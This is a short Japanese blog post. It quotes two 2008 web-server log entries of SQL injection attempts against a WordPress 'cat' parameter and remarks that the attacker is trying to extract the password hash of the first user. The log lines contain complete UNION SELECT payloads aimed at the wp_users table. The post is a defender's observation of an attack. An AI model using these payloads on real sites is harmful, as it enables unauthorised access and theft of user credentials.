sqlインジェクション

ns.km22518.keymachine.de - - [19/Jul/2008:22:25:12 +0900] "GET /wordpress/index.php?cat=%27+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 14883 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
ns.km22518.keymachine.de - - [19/Jul/2008:22:25:14 +0900] "GET /wordpress/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 200 14877 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

パスワードを割り出そうとしているのか。wordpressのユーザidの1番目のパスワードをselectで取得しようとしているのがログから読み取れる。

コメントを残す

メールアドレスが公開されることはありません。

日本語が含まれない投稿は無視されますのでご注意ください。(スパム対策)